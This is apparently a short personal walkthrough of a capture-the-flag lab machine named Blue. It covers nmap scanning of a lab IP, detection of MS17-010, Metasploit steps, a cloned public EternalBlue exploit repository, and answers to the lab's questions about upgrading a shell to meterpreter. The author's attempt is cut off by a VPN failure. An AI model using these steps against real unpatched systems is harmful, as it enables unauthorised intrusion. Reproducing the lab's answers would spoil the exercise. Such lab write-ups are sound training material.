BLUE
OS: Windows
بسم الله الرحمن الرحيم
Recon
using Nmap
nmap 10.10.55.229 -sV -sC How many ports are open with a port number under 1000?
sudo nmap 10.10.55.229 -p 1-1000 #Result = 3
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
sudo nmap 10.10.55.229 -sV -p T:135,139,445 --script="smb-vuln-*"
the OS windows VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
Gain Access / initial Access
using MSF6
msfconsole
search ms17-010
use 0
options
set RhOSTS
My connection was cut off there was a problem with vpn
but in my PC FAIl
i will try search I Found exploit https://github.com/3ndG4me/AutoBlue-MS17-010
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010/shellcode
./shell_prep.sh
Escalate
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
Answer post/multi/manage/shell_to_meterpreter
Select this (use MODULE_PATH). Show options, what option are we required to change?
Answer session
Last updated